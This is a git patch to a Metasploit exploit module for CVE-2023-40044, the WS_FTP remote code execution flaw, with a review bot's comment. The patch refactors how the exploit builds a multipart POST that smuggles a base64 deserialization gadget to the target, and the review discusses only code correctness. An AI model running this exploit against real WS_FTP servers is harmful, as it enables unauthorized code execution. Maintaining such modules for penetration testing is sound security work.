From 8431d116546aa01279b4ab212bc2928497370eb9 Mon Sep 17 00:00:00 2001
From: sfewer-r7
Date: Wed, 4 Oct 2023 09:39:25 +0100
Subject: [PATCH] leverage Rex::MIME::Message instead of creating the multipart data manualy
---
 .../windows/http/ws_ftp_rce_cve_2023_40044.rb | 21 +++++++------------
 1 file changed, 7 insertions(+), 14 deletions(-)
diff --git a/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb b/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
index d7b576af6785..b38fa424a44f 100644
--- a/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
+++ b/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
@@ -128,25 +128,18 @@ def exploit
 # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.
 tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]
- boundary = rand_text_alphanumeric(8)
+ message = Rex::MIME::Message.new
- data = "--#{boundary}\r\n"
- data << "name: #{rand_text_alphanumeric(8)}\r\n"
- data << "\r\n"
- data << "::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n"
- data << "--#{boundary}–\r\n"
- data << "\r\n"
+ part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)
- res = send_request_raw(
+ part.header.set('name', rand_text_alphanumeric(8))
+
+ res = send_request_cgi(
 {
 'uri' => normalize_uri(datastore['TARGET_URI']),
- 'headers' =>
- {
- 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
- 'Content-Length' => data.length
- },
+ 'ctype' => 'multipart/form-data; boundary=' + message.bound,
 'method' => 'POST',
- 'data' => data
+ 'data' => message.to_s
 }
 )
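Review bot: The three bare positional `nil`s in `message.add_part(..., nil, nil, nil)` are undocumented, so a reader cannot tell which per-part headers they suppress (presumably content type, transfer encoding and content disposition) or why the part then gets a non-standard `name` header. A one-line comment above the call would cover it, for example `# nil content type / transfer encoding / disposition: the part carries only the random 'name' header, as the hand-built body did`. The part body also keeps the literal `\r\n` from the hand-built version; if Rex::MIME terminates each part itself (not visible here), the serialized body now differs from the old one by an extra CRLF, so it is worth diffing `message.to_s` against the old `data` once. `exploit` starts before and continues after this hunk, so how `res` is checked is not visible.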